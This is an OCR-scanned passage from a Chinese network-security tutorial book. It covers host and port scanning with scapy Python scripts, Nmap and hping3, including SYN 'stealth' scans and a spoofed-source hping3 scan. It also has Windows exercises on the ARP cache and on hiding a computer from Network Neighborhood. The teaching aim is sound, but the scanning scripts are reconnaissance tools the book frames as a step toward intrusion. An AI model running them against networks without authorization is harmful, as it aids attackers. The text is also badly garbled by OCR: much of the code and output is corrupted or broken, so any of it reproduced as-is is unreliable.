# 定 义 一 个 变量 ,将 参数 赋值 给 地 址 变量 
# 使 用 分 割 函数 分 割 出 IP 地 址 的 前 三 段 
prefix = address.split('.') 
EO 
Ei -taddress split NIZE 
Tor addr Ln Fange (ls 20a)s 
# 使 用 for 循 环 遍 历 整 个 网 段 
# 构 造 发 送 TCP 数 据 包 
response = srl(IP(dst=prefix+str 
(addr)) /TCP (dport=80, flags="'A'),timeout= 
0.1,verbose=0) 
trY: 二 异常 处 理 
if int(response[TCP] .fags) == 4: 
# 如 果 返 回 的 数据 包 是 Reset 的 数据 包 ， 认 为 存活 
print Prefix+str (addr) 


./TCP_SCAN.pYy 
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# 将 存活 主机 打印 输出 
except: 
pass 


10.4.2 UDP 扫描 


UDP (User Datagram Protocol， 用 户 数 
据 报 协议 ) 是 OSI (Open System Intercon- 
nection， 开 放 式 系统 互联 ) 参考 模型 中 一 
种 无 连接 的 传输 层 协议 ， 提 供 面向 事务 的 
简单 不 可 靠 信 息 传 送 服务 。 

UDP 探测 主机 的 原理 为 : 当 客 户 端 向 
目标 主机 发 送 一 个 UDP 请 求 时 ， 如 果 目 标 
主机 开放 了 此 端口 ， 不 会 做 出 任何 响应 ， 

如 果 该 主机 没有 开放 此 端口 ， 会 回复 一 个 
端口 不 可 达 信息 。 

使 用 scapy 工 具 进 行 UDP 扫 描 的 操作 步 
又 如 下 : 


查看 UDP 数据 包 结 构 ， 使 用 ua= 
UDP(); u.display(O 命 令 ， 执 行 效 果 如 下 图 
所 示 。 

>>> i=IP() 

>>> U=UDP() 


>>> u.display() 

并 ###[ UDP ]### 
sport= domain 
dport= domain 
len= None 
chksum= None 


查看 完整 UDP 数 据 包 结构 ， 使 用 r=(i/ 
.display0 〇 0 命令， 执行 效果 如 下 图 所 示 。 


;> T=(170) .dispUay() 

Hi#[ IP ]### ###[ UDP ]### 
version= 4 sport= domain 
ihl= None dport= domain 
tos= 9x9 len= None 
len= None chksum= None | 


IE :| 使 用 TIP] dst="192.168.1.1" 命 令 修 改 
目标 IP 地 址 ， 使 用 r[UDP].dport=6666 命 令 
修改 目标 端口 ， 使 用 rdisplay() 命 令 查看 修 
改 后 的 数据 包 ， 执 行 效果 如 下 图 所 示 。 


3 TIIPJT-GST="T9Z-T68-T-Tr | 
上 >> r[UDP] .dport=6666 
p>> r.display() 
[ IP ]### ###[ UDP 
version= 4 spo 
ihl= None dpo 
tos= Bx9 Ten 


len= None 
id= 1 
flags= 
frag= 9 


step 园 使 用 srl(rtimeout=1).displayO 命 令 发 
送 数 据 包 并 查看 返回 结果 ， 执 行 效 果 如 下 
图 所 示 。 


ge STI(T, timeout=1).displayl) 
egin emission: 
.Finished sending 1 packets. 


hocciyes 2 packets, got 1 answers, remaining 0 packets 

F##[ IP ]### #H#¥| IP in ICMNP 1### 
version= 4 version= 4 

iht= 


ttl= 128 

proto- icnmp 
chksum= 9xb697 
src= 192.168.1.103 
dst= 192:166.1.101 


\options\ \options\ 

Nun ICHP J ww wm#l UDP in ICMP J4s# 
type= dest-unreach sport= domain 
code= port-unreachabl dport= 5566 
chksum= Ox8133 len= 8 
reserved= 0 chksun= Bx6182 
length= 0 


nexthopmtu= © 


侈 提示 : 如 果 目 标 主机 没有 开放 相应 的 端 
口 ， 会 返回 一 个 目标 不 可 达 消息 ， 但 是 也 
有 个 别 设备 不 会 响应 这 类 数据 包 ， 为 了 吉 
免 一 直 等 待 ， 可 以 加 入 超时 检测 指令 。 


使 用 一 条 命令 可 以 完成 UDP 打 
描 ， 该 命令 为 sr1(IP(dst="192.168.1.103")/ 
UDP(dport=6666)).display()， 执 行 效果 如 下 
图 所 示 


re =rT9Z-T68-TTgJrJ7UDPTdpoTT=6655JJ-dISPUa7U 
egin emission: 
.Finished sending 1 packets. 


eceived 2 packets, got 1 answers, renaining 9 packets 
WW#[ IP ]### 

version= 4 
ihl= 


44#[ IP in ICHP ]### 
version= 4 


chksum= Oxb505 Oxf6b3 
src= 192.168.1.193 68.1.101 
92.168.1.101 dst= 192.168.1.103 
\options\ \options\ 

jp#[ ICMP ]### #4#[ UDP in ICHP J### 
type= dest-unreach sport= domain 
code= port-unreachable dport= 6666 
chksum= 9x8133 len= 8 
reserved= 0 chksum= ex6182 
length= 9 

nexthopmtu= 0 
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下 面 编 辑 一 个 python 肢 本 实现 四 层 UDP 
自动 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

if len(sys.argv) !=2: 

print"Usage . ./UDP_SCAN.py 
network address]" 

print"Example . 
L9268 YL 

print "Example will perform a TCP 
ACK Ping scan of the 192.168.1.0/24 
Tange" 

sys.exit() 

address = str(sys.argv[1]) 

DYE = dddress spilt sm) 
EPON Bap 
Elm "addresasapiat te 2 

for addr in range(1,254) : 


[/24 


./UDP_SCRN.pY 


# 循 环 遍 历 整个 TP 地 址 段 
# 构 建 UDP 数 据 包 ,设置 超 时 时 间 ， 不 查看 错误 信息 
response = srl(IP(dst=prefix+str 


(addr) ) /UDP (dport=6666) ,timeout=0.1,verb 
ose=0) 
trys 
if int(response[IP] .proto) == 1: 
#IP 的 上 层 协议 如 果 是 1 ( ICMP ) 认为 是 有 数据 返回 
print prefixtstr (addr) 
# 将 存活 主机 IP 地 址 打印 出 来 
except: 
pass 


10.4.3 ”工具 扫描 
使 用 Namp、hping3 等 工具 可 以 进行 四 加 
层 扫 描 。 
1. Nmap 工 具 


Nmap 工 具 在 四 层 扫 描 的 功能 还 是 非常 
强大 的 ， 使 用 的 具体 操作 步骤 如 下 : 


step 园 使 用 Nmap 113.105.151.1-100 -PU666 
-sn 命令 ， 可 以 实现 UDP 扫 描 ， 执 行 效果 如 
下 图 所 示 。 


footerali: # nnap 192.168.1.1-166 -PUG66 -sn 
Starting Nnap 7.76 ( https://nnap.org ) at 2918-19-26 63:51 EDT 


Nrap scan report for 192.168.1.1 
Host is up (6.09971s latency) 

mac Address: lc:Fa:68:61:2F:68 (Tp-Link Technologies) 

Nmap scan report for 162.168.1.160 

Host is up (6.09918s latency) 

mac Address: 90:25:22:F9:5F:44 (ASRock Incorporation) 

aap done: 160 IP addresses (2 hosts up) scanned in 3.95 seconds 
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steep 国 使 用 Nmap 192.168.1.1-100 -PA666 -sn 
命令 ， 可 以 实现 TCP 扫 描 ， 执 行 效果 如 下 图 
所 示 。 


Foot@kali:-# nmap 192.168.1.1-160 -PA666 -Sn 

tarting Nmap 7.79 ( https://nnap.org ) at 2918-19-26 63:53 EDT 
map scan report for 192.168.1.1 

Host is up (6.99684s latency!. 

IAC Address: 1C:FA:68:61:2F:98 (Tp-link Technologies) 

区 scan report for 192.168.1.109 

lo: 


st is up (0.09918s latency!. 
\C Address: 99:25:22:F9:5F:44 (ASRock Incorporation) 
map done: 199 IP addresses 12 hosts up) scanned in 2.35 seconds 


step 国 在 扫描 上 ，Nmap 不 局 限于 -PU 与 -PA 
两 个 参数 ， 还 有 其 他 参数 。 具 体 的 参数 信 
息 如 下 图 所 示 。 


FGST DTSCOVERTY 
-SL: List Scan - simply list targets to scan 
sn: Ping Scan - disable port scan 
-Pn: Treat all hosts as ontine -- 
PS/PR/PU/PY[porrtist];， TCP SYN/ACK, UDP or SCTP discovery to given ports 
“PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes 
polprotocol Uist]: IP protocol ping 
“N/R: Never do DNS resolution/Always resolve [default: sometines] 
dns-servers <servl[,serv2],...>: Specify custom DNS servers 
-Systen-dns; Use 05'5 DNS resolver 
traceroute: Trace hop pnth to each host 


skip host discovery 


侈 提 示 : 当然 也 可 以 采用 地 址 列表 导入 
的 形式 进行 四 层 扫 描 ， 该 命令 为 Nmap - 谍 
addr.txt -PA80 -sn。 


2. hping3 工 具 


使 用 hping3 工 具 可 以 进行 四 层 扫 描 ， 具 
体操 作 步 又 如 下 : 
step 加 使 用 hping3 192.168.1.103 --udp -c 1 命 
令 ， 可 以 对 该 地 址 实现 基于 UDP 的 扫描 ， 
执行 效果 如 下 图 所 示 。 


FaatBRUI-W PING3 192 1651103 -udp -eT 
HPING 192.168.,1.103 (ethg 192.168.1.103): udp mode set, 28 headers + 0 data bytes| 
CNP Port Unreachable from ip=192.168.1,193 nane=UNKNOWN 

status=0 port=1586 seq=0 


-192.168.1.183 hping statistic -~ 
| packets transmitted, 1 pacxets received, o% packet loss 
[round-trip min/avg/max = 29.7/29.7/29.7 ms 


下 面 给 出 一 段 基于 UDP 的 shell 脚 本 ， 
使 用 该 脚本 可 以 自动 进行 UDP 扫描 ， 具 体 
代码 如 下 : 


#!/bin/bash 
| Ws 4 
echo "Usage - ./hping udp.sh [/24 
network address]" 


echo "Excample —- ./hping udp.sh 
:rs Hy By 
echo "Example will perform a UDP 


Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt file" 
EX 
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fi 
prefix=$(echo $1 | cut =d "。" =-f£f 1=3) 
# 去 除 IP 地 址 前 三 段 
for addr in $(seq 1 200) ;do 
得 使 用 循环 遍历 1-200 
hping3 $prefix.$addr --udp -c 1 >> 
工 -txt 间 将 结果 保存 到 z.txt 文 件 当中 
done 
# 使 用 grep 过 滤 出 存活 主机 的 TP 地址 ， 将 其 保存 
到 output .txt 文 件 中 
grep Unreachable r.tzxt | cut -dd "" 
PES x = 2 Oputs exe 
rm r.txt 音 删 除 临时 文件 


[step 图 使 用 hping3 192.168.1.103 -c 1 命令 ， 
可 以 对 该 地 址 实现 基于 TCP 的 扫描 ， 执 行 效 
果 如 下 图 所 示 。 


ooo ping3 192-1681 103 -eT 
HPING 192.168.1,163 [ethB 192.168.1,163)， NO FLAGS are set, 40 headers + 9 data bytes 
nr46 pm192. 168.1.193 tttr128 1dr178 sportrg flagsmRA seqr@ Win rtte7.8 ms 


192.168.1.103 hping statistic 
1 packets transnitted, 1 packets received, 0% packet loss 
[ound-trip nin/avg/max = 7.8/7.8/7.8 ms 


下 面 给 出 一 段 基于 TCP 的 shell 和 脚本， 使 
用 该 脚本 可 以 自动 进行 TCP 扫 描 ， 具 体 代码 
如 下 : 


#!/bin/bash 
1£ [ "S$#" =ne 1 Irthen 
echo "Usage - ./hping tcp.sh [/24 
network address]" 
echo "Excample 一 
L925 1680.1 
echo "Example will perform a TCP 
Ping SWeep of the 192.168.1.0/24 network 
and output to an output.txt file" 
exit 
ff 
brefizx=$(echo SL I eut = ".™ =£ 1=3} 
# 去 除 IP 地 址 前 三 段 
for adqr in $(seq 1 200) ;do 
# 使 用 循环 遍历 1-200 
hping3 $prefix.$addr -c 1 >> r.txt 
# 将 结果 保存 到 .txt 文件 当中 
done 
专利 选 出 以 len 开头 的 字段 ， 并 保存 到 output . 
txt 文 件 中 
grep' “Len stxtE IECUEE=G ”全 
= = 2 > Outputetxt 


# 删 除 临 时 文件 


./hping tcp.sh 


3 |] 
cut 
rm r.txt 


(全 注意 : hping3 工 具 在 发 送 TCP 数 据 包 时 与 
其 他 工具 不 同 ， 它 发 送 的 TCP 数 据 包 flags 字 
段 全 部 都 是 0， 如 下 图 所 示 。 


= Transnission Control Protocol, Sre Port: 2552, DSE Port: 8 Seq: 1, Len: © 


[Tcp Flag 


如 下 图 所 示 。 


实战 演练 
实战 演练 1 一 一 查看 系统 中 的 ARP 缓 存 表 


10.5 


在 利用 网 络 欺骗 攻击 的 过 程 中 ， 经 常 
用 到 的 一 种 欺骗 方式 是 ARP 欺 骗 ， 但 在 实 
施 ARP 欺 骗 之 前 ， 需 要 查看 ARP 缓 存 表 。 那 
么 如 何 查 看 系统 的 ARP 缓 存 表 信息 呢 ? 

具体 的 操作 步骤 如 下 : 
[step 图 右 击 “ 开 始 ” 按 钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ”对 话 框 ， 在 “打开 ”文本 框 中 输入 cmd 
命令 ， 如 下 图 所 示 。 


可 运行 


Windows 构 慨 据 你 i 的 名 称 ， 为 你 打开 柜 应 的 程序 . 
四 


打开 (O) [emd 


府 宇 BE 济 疙 (8).- 


[Be 图 单 击 “ 确 定 ”按钮 ， 打 开 “ 命 令 提示 
符 ” 窗 口 ， 如 下 图 所 示 。 


step 图 在 “命令 提示 符 ” 窗 口中 输入 arp -a 
命令 ， 按 Enter 键 执行 命令 ， 即 可 显示 出 
本 机 系统 的 ARP 缓 存 表 中 的 内 容 ， 如 下 图 
所 示 。 


一 伟 罗 


[Sep 加 在 “命令 提示 符 ” 窗 口中 输入 arp -d 
命令 ， 按 Enter 键 执行 命令 ， 即 可 删除 ARP 
表 中 所 有 的 内 容 ， 如 下 图 所 示 。 


实战 演练 2 一 一 在 “网 络 邻 居 ” 
自己 


如 果 不 想 让 别人 在 “网 络 邻居 ”中 看 
到 自己 的 计算 机 ， 则 可 把 自己 的 计算 机 名 


中 隐藏 
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称 在 “网 络 邻居 ”里 隐藏 ， 具 体 的 操作 步 
又 如 下 : 

[step 图 右 击 “开始 ”按钮 ， 在 弹出 的 快捷 
菜单 中 选择 “运行 ”菜单 命令 ， 打 开 “ 运 
行 ” 对 话 框 ， 在 “打开 ”文本 框 中 输入 
regedit 命 令 ， 如 下 图 所 示 。 


吾 运行 x 

画 Windows 将 根据 你 所 边 入 的 名 称 ， 为 你 打开 相应 的 程序 
文件 来、 文档 或 Internet 资源 

打开 (O): |reged 计 v 


单 击 “ 确 定 ”按钮 ， 打 开 “ 注 册 表 纺 
辑 器 ”窗口 ， 如 下 图 所 示 。 


取消 浏览 (B).… 


图 注册 表 编 名 路 一 口 x 
文件 (和 篇 缉 (6) 得 看 (V) 收藏 实 (A) 帮助 (H) 
v 辐 计算 机 | 名称 类 型 


[a HKEY_CLASSES ROOT 
闻 HKEY_CURRENT_USER 
1 HKEY_LOCAL MACHINE 
闻 HKEY_USERS 

闻 HKEY_CURRENT_CONFIG 


计算 机 
step 图 在 “注册 表 编 辑 器 ”窗口 中 ， 展 开 分 
支 到 HKEY LOCAL MACHINE\SYSTEM\ 


CurrentControlSet\Services\LanManServer\ 
Parameters 选 项 下 ， 如 下 图 所 示 。 


(Defauhtsecurty 


REG_EXPAND_SZ 
pwomp 


ENHKEY LOCAL MACHINEVSYSTEMNCurrentControlSetiServiccslenmenSerreriparameter 
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[step 轩 选中 Hidden 选 项 并 右 击 ， 从 弹出 的 快 
捷 菜 单 中 选择 “修改 ”菜单 项 ， 打 开 “ 编 
辑 字符 串 ” 对 话 框 ， 如 下 图 所 示 。 


综 志 字符 齐 x 


[Eee 图 在 “数值 数据 ”文本 框 中 将 dword 类 
键 值 从 0 设置 为 1， 如 下 图 所 示 。 


绽 志 字符 惠 x 


Ew Cw 
Bg 国 单 去 “确定 ”按钮 ， 就 可 以 在 “网 
络 邻 居 ” 中 隐藏 自己 的 计算 机 ， 如 下 图 
所 示 。 


哼 | 日 中 
| 4 "< 


¢ 个 忌 


计算 机 (2) 


:| 网 络 科技 


国 reonoses 


网 络 论 施 (1) 


并 锯 右 论 问 
~ 国 此 吧 防 
司 4 
局 田 片 
佛 文 划 
人 
小 于 
CE 
所 Windows10 (CG 
二 软件 (DJ 


> Wreless N Router THwraten 


10.6 ”小 试 身手 


练习 1: 认识 扫描 工具 Nmap。 

练习 2: 使 用 工具 进行 二 层 扫 描 。 
练习 3: 使 用 工具 进行 三 层 扫 描 。 
练习 4: 使 用 工具 进行 四 层 扫描 。 


第 11 曹 ”扫描 无 线 网 络 中 的 主机 


不 同 的 服务 通过 不 同 的 端口 提供 服务 ， 先 识别 主机 中 开放 了 哪些 端口 ， 再 根据 端口 确 
定 主机 开放 了 哪些 服务 。 本 章 介绍 如 何 对 无 线 网 络 中 的 存活 主机 进行 各 种 扫描 ， 主 要 包括 
扫描 UDP 端口 、 扫 描 TCP 端 口 、 扫 描 Banner 信 息 、 扫 描 SNMP 协 议 等 。 


11.1 扫描 主机 端口 


如 果 把 IP 地 址 比 作 一 间 房 子 ， 端 口 就 
是 出 入 这 间 房 子 的 门 。 真 正 的 房子 只 有 几 
个 门 ， 但 是 一 个 IP 地 址 的 端口 可 以 有 65536 
个 之 多 。 端 口 是 通 过 端口 号 来 标记 的 ， 范 
围 是 从 0 到 65535。 每 一 个 端口 对 应 一 个 网 
络 应 用 或 应 用 端 程序 ， 因 此 ， 黑 客 通过 开 
放 的 端口 可 以 入 侵 系统 漏洞 ， 所 以 发 现 主 
机 开放 的 端口 就 变 得 尤为 重要 。 


11.1.1 扫描 UDP 端口 


扫描 UDP 端口 与 扫描 UDP 主机 是 不 同 
的 ， 虽 然 使 用 的 技术 相同 。 扫 描 UDP 端 口 
只 针对 目标 主机 不 响应 ， 以 此 判断 UDP 端 
口 打开 ， 而 对 于 有 响应 则 认定 是 没有 开放 
UDP 端口 。 


1. scapy 工 具 


使 用 scapy 编 写 python 脚 本 自动 化 端口 
扫描 程序 ， 有 具体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
import time # 导 入 时 间 库 
import sys  ”# 导 入 系统 库 
if lenl(sys.argv) !=4: 
状 如 果 输 入 的 参数 不 是 4, 做 出 提示 
print"Usage . ./udp_ scan port.py 
[Target =IP]IrFiest PortllLast Portl” 
print"Example . ./udp_ scan port 
L9268 .LL TOO 


print “Example will UDP port scan 
ports 1 through 100 on 192.168.1.1" 
SYS .exit() 
ip = sys.argv[1] # 取 出 参数 中 的 ITP 地 址 
portl = int(sys.argv[2]) 
# 取 出 参数 中 的 第 一 个 端口 号 
port2 = int(sys.argv[3]) 
# 取 出 参数 中 的 第 二 个 端口 号 
for port in range (portl,port2): 
# 以 给 定 端口 的 范围 进行 扫描 
# 构 建 UDP 数 据 包 进行 发 送 
a = srl(IP(dst=ip)/UDP (dport=port), 
timeout=0.1,verbose=0) 
time.sleep(1)# 延 时 1s 
if a==None: +# 如 果 没 有 返回 数据 认为 端口 开放 
print port# 将 该 端口 打印 输出 
else: 2 
pass 罩 典 


应 用 上 述 编码 ， 可 以 扫描 主机 开放 的 
端口 信息 。 


2. Nmap 工 具 


使 用 Nmap 工 具 可 以 扫描 UDP 端 口 ， 具 
体操 作 步 又 如 下 : 
[step 图 使 用 Nmap -sU 192.168.1.103 命 令 ， 扫 
描 主 机 IP 地 址 为 192.168.1.103 的 端口 信息 ， 
执行 效果 如 下 图 所 示 。 如 果 没有 指定 端口 
号 ， 默 认 情况 下 ，Nmap 会 扫描 常用 的 1000 
个 端口 号 。 


Foot@kali:-# nmap -5U 192.168.1.103 

Starting Nnap 7.79 ( https://nmap.org ) at 2918-19-26 94:07 EDT 

Nmap scan report for 192.168.1.193 

Host is up (6.9936s latency) 

Not shown: 992 closed ports 
SERVICE 

hz3/udp open ntp 

ha7/udp open 

138/udp open|filtered netbios-dgn 

445/udp open|filtered microsoft-ds 

5ee/udp open|filtered isakmp 

hezsyudp open|filtered blackjack 

loee/udp open|filtered upnp 

45eeyudp open|filtered nat-t-il 

MAC Address: 69:9C:29:A2:4E:97 are 


Nmap done: 1 IP address (1 host up) scanned in 1.49 secords 
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fsep 贺 指定 端口 进行 扫描 ， 使 用 Nmap -sU 
192.168.1.103 -p 123 命 令 。 如 果 端 口 开放 ， 
执行 效果 如 下 图 所 示 。 

人 pe nmap -SU 192.168.1.163 -p 123 
tarting Nmap 7.79 ( https://nmap.org ) at 2618-19-26 64:13 EDT 


map scan report for 192.168.1.193 
Host is up (6.66934s Latencyl. 


ORT 。 STATE SERVICE 
123/udp open ntp 
MAC Address: 90:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 6.22 seconds 
Estee 图 使 用 Nmap -sU 192.168.1.103 -p 888 命 
令 ， 如 果 端 口 不 开放 ， 执 行 效果 如 下 图 所 
示 。 如 果 需 要 扫描 多 个 端口 使 用 “-” 进 行 
分 割 ， 如 -p 1-65535， 进 行 全 端口 扫描 。 
00tOKali-# nmap -sU 192.168.1.103 -p 888 

tarting Nmap 7.79 ( https://nmap.org ) at 2018-19-26 94:15 EDT 


map scan report for 192.168.1.103 
ost is up (9.06948s latency|. 


ORT 。 STATE ”SERVICE 
88/udp closed accessbuilder 
IAC Address: 00:0C:29:A2:4E:07 (VMware) 


map done: 1 IP address (1 host up) scanned in 6.22 seconds 


侈 提示 : Nmap 还 支持 从 文件 中 读 取 地 址 列 
表 进 行 端口 扫描 ， 使 用 的 命令 为 Nmap -让 
addr.txt -SU -p 1-333。 


渴 11.1.2 ”扫描 TCP 端 口 


扫描 TCP 端 口 要 比 扫描 UDP 主机 复杂 ， 


” 它 是 基于 TCP 连 接 协 议 的 扫描 ， 其 中 包括 


隐蔽 扫描 、 全 连接 扫描 、 中 间 人 扫描 ， 这 
些 众多 扫描 方式 都 是 基于 三 次 握手 的 变化 
来 完成 的 。 


1. 隐蔽 扫描 


隐蔽 扫描 主要 是 通过 向 目标 主机 特定 
端口 发 送 SYN 包 。 如 果 目 标 主机 回复 RST 数 
据 包 ， 隐 项 扫描 则 根据 回复 数据 包 ， 来 判 
断 主 机 端口 是 否 开放 ， 由 于 没有 建立 完整 
连接 ， 所 以 应 用 日 志 不 记录 扫描 行为 ， 从 
而 达到 一 定 程 度 的 隐蔽 。 

(1) scapy 工 具 。 使 用 scapy 实 施 隐 
蔽 扫描 ， 使 用 a=srl(IP(dst="192.168.1.1")/ 
TCP(flags='S'), timeout=1) 命令 ， 给 目标 主 
机 发 送 SYN 包 ， 目 标 主机 回复 SYN/ACK 
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数据 包 ， 使 用 wirshark 抓 包 可 以 看 到 除 此 
之 外 还 多 出 一 个 RST 数据 包 ， 这 是 由 于 操 
作 系 统 不 知道 SYN 包 的 发 送 ， 因 此 当 目 标 
主机 发 送 SYN/ACK 时 便 自动 回复 RST 数 
据 包 ， 执 行 效果 如 下 图 所 示 。 


Destination Protocol Length inio 
192.168.1.1 TCP 4 20 ~ 0 [SYN] Sed:0 Win=8192 Le 
a KY seq Ach=1 Wn=163 


这 里 给 出 一 段 python 脚 本 实现 TCP 自 动 
扫描 的 代码 ， 具 体 代码 如 下 : 


#!/usr/bin/python 


import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
import sys 
if lenl(sys.argv) !=4: 
如 果 输 入 参数 不 是 4, 做 出 提示 
print"Usage . ./syn scan.py [Target 
-IP] [First Port] [Last Port]" 
print"Example -Xayvn acan 
192>169s LL L000 
print "Example will TCP SYN scan port 
scan ports 1 through 100 on 192.168.1.1" 
sys.exit() 
ip = sys.argv[1]# 获 取 IP 地 址 
portl = int (sys.argv[2])# 获 取 起 始 端 口 
port2 = int (sys.argv[3])# 获 取 结 束 端 口 
for port in range (Port1l,Port2) : 
# 循 环 遍历 端口 区 段 
# 构 造 TCP 数 据 包 并 发 送 
a = srll(IP(dst=ip)/TCP (dport=port), 
timeout=0.1,verbose=0) 
if a==None: 。 # 如 果 数 据 为 空 不 做 处 理 
pass 
else: 
if int(a[TCP] .fags==18) : 
# 判 断 返 回 数据 包 TCP 标 记 为 18, 即 SYN/ACK 
print port # 打 印 出 端口 
else: 
pass 


(2) Nmap 工具 。 使 用 Nmap 扫描 相对 
比较 简单 ， 直 接 使 用 工具 ， 然 后 添加 响应 
的 参数 ， 即 可 完成 扫描 。 具 体 的 方法 为 : 
使 用 Nmap 192.168.1.103 -p 1-200 命令 扫 
描 ， 默 认 情 况 下 ，Nmap 工具 使 用 SYN 方 
式 来 扫描 端口 。 扫 描 结 果 如 下 图 所 示 。 


var ting Nap_ 7.79《 Mitps:/ romap:org. ) ot. Zo15-19-28 95:37 Em| 
map scan report for 192.168,1.16: 

lost is up (9.99033s Latency| 

lot shown: 198 closed ports 


EE =7TESETPorE nmap 197-168- 1 163 -PT-798 
ORT STATE SERVICE 

35/tcp open msrpc 
39/tcp open netbios-ssn 


C Address: 09:0C:29:A2:4E:07 (VMware) 


Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds 


另外 ， 可 以 使 用 Nmap -sS 192.168.1. 
103 -p 1-200 命 令 ， 指 定 使 用 SYN 包 的 方式 
进行 扫描 ， 其 扫描 结果 是 一 样 的 。 还 可 以 
使 用 Nmap -sS 192.168.1.103 -p 1-65535 或 
Nmap -sS 192.168.1.103 -p- 命 令 ， 实 现 全 端 
口 扫描 。 
侈 提示 : 如 果 目 标 主机 被 防火 墙 过 滤 ， 
可 能 会 有 一 些 非 open 状 态 的 端口 被 显示 ， 
此 时 可 以 通过 加 入 --open 进 行 过 滤 ， 只 显 
示 open 状 态 的 端口 。 如 果 有 多 个 不 连续 的 
端口 可 以 使 用 “，” 进 行 分 隔 ， 如 “80， 
85，135” 这 样 。 

(3)hping3 工具 。 使 用 hping3 192.168.1. 
103 --scan 100-200 -S 命令 ， 实 现 对 100 一 200 
端口 扫描 ， 使 用 SYN 包 的 方式 ，hping3 显 
示 出 来 的 结果 条 例 更 清晰 一 些 。 类 似 表 格 
的 形式 如 下 图 所 示 。 


00TEKALI: /Tost/ ori pingj 192. 168.1.193 --scan 150-260 -9 
canning 192.168.1.193 (192.168.1.193)，port 190-269 
81 ports to scan, use -V to see all the replies 


135 Loc.sry 128 14087 16616 46" 
139 netbios-ssn: .5..A... 128 15111 16616 46 
AL reptles received. Done. 

ot responding ports: 


另外 ， 使 用 hping3 -c 200 -S --spoof 
192.168.1.155 -p ++1 192.168.1.103 命 令 ， 实 
现 欺骗 扫描 。 

从 1 这 个 端口 开始 扫描 ， 每 次 端口 
加 1 总 共 发 送 200 个 数据 包 ， 伪 造 地 址 
“192.168.1.155”， 要 扫描 的 目标 地 址 为 
“192.168.1.103”， 这 样 做 的 优点 是 隐 
蔽 ， 缺 点 是 本 机 无 法 查看 到 结果 ， 可 以 
通过 交换 机 镜像 端口 ， 或 者 是 有 权 查 看 
192.168.1.155 才 可 以 。 


2. 全 连接 扫描 
直接 与 目标 主机 建立 三 次 握手 ， 如 果 


第 11 章 ”扫描 无 线 网 络 中 的 主机 


能 够 建立 三 次 握手 证 明 主 机 端口 开放 。 全 
连接 扫描 的 优点 是 结果 准确 ， 缺 点 是 完全 
暴露 没有 隐蔽 。 

(1) scapy 工 具 。 直 接 使 用 脚本 建立 三 
次 握手 ， 具 体 代码 如 下 : 


#!/usr/bin/python 

import logging 

import subprocess 

logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 

from scapy.all import * 

# 发 送 SYN 包 

response = srl(IP(dst="192.168.1.1") 
/TCP (dport=80, flags='S')) 

# 第 二 次 发 送 使 用 目标 主机 返回 的 seq 值 将 其 +1 处 
理 ， 这 样 构成 一 个 完整 通信 

reply = srll(IP(dst="192.168.1.1")/ 
TCP(dport= 80,flags='A',ack=(response 
[TCP] .seq+1))) 


提出 猜想 ， 之 前 通过 发 送 数 据 包 了 解 
到 ， 系 统 会 自动 回复 RST 包 ， 修 改 脚本 验证 
猜想 ， 使 得 发 送 数据 显示 出 来 。 修 改 后 的 
代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
# 构 造 SYN 包 
SyalP (last I 6 
TCP (dprot=80,flags='S') 
print ”== SENE ==® 
# 在 终端 打印 出 一 个 发 送 标记 
SYN.display () # 在 终端 显示 数据 包 内 容 
print"\n\n-= RECEIVED =-" 
# 在 终端 打印 发 送 结束 标记 
response = srl(SYN,timeout=1, 
Verbose=0)  # 将 构造 好 的 SYN 包 发 送出 去 
response.display() 
坦 在 终端 打印 返回 的 数据 包 
if int(response[TCP] .flags)==18: 
得 判断 回复 的 是 否 为 SYN/RCK 
Print YN SENYP =—™ 
# 再 次 打印 发 送 标记 
# 构 造 返回 包 
A = IP(dst="192.168.1.1")/TCP (dport= 
80,flags='A',ack= (response [TCP] .seql+1)) 
A.display() # 展 现 构造 好 的 数据 包 


| 
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print"\n\n-- RECEIVED --"# 打 印 结束 标记 
response2=srl (A,timeout=1,verbo 
# 将 构造 好 的 数据 包 发 送 
response2.display ()# 在 终端 打印 返回 数据 包 
ELSeES 
print"SYN-ACK not returned 


# 如 果 端 口 不 开放 , 打印 提示 

使 用 上 述 代码 进行 扫描 的 操作 步骤 
如 下 : 
step 国 发 送 第 一 个 SYN 数 据 包 ， 如 下 图 


se=0) 


所 示 。 
FSENT = - 一 一 一 
Hi#[ IP ]### ###[ TCP ]## 
version = 4 sport = ftp_data 
ihl = None dport 
tos = Ox seq 
len = None ack 
id =1 dataofs 
flags = reserved 
frag =0 flags 
ttl = 64 window 
proto = tcp chksum 
chksum = None urgptr 
src = 192.168.1.161 options = 
dst = 192.168.1.1 
Noptions \ ~ RECEIVED - 


step 图 这 时 会 返回 SYN/ACK 数 据 包 内 容 ， 
如 下 图 所 示 。 


BT IP 下 HAL TCP 天 证 


Version = 4 sport 

inht =5 dport 

tos ex9 seq 

len 44 ack 

id 39495 dataofs = 

flags DF reserved = 

frag 9 flags = 

ttl 64 window = 16384 

proto tcp chksun = 6x7262 
chksum Oxlcce urgptr =0 

src 192,168.1.1 options = [('Mss', 1469)] 
dst = 192.168.1.101 ###[ Padding ]### 

\options \ load = '\x08\x00" 


step 图 此 时 满足 条 件 ， 因 此 构建 第 二 个 ACK 
数据 包 ， 如 下 图 所 示 。 


Ws#[ IP ]### 有 [TCF J]### 
version = 4 sport = http 
iht 5 dport = ftp data 
tos exe seq = 3865475985 
len 49 ack =0 
id 39496 dataofs = 5 
flags reserved = 9 
frag 9 flagss =R 
ttl 64 window =0 
proto tcp chksum = 9xc9cd 
chksum 9x5cd1 urgptr =0 
src 192.168.1.1 options = [] 
dst = 192.168.1.161 ###[ Padding ]### 
\options \ load = '\x68\x00\x90\x00\x00\x90 


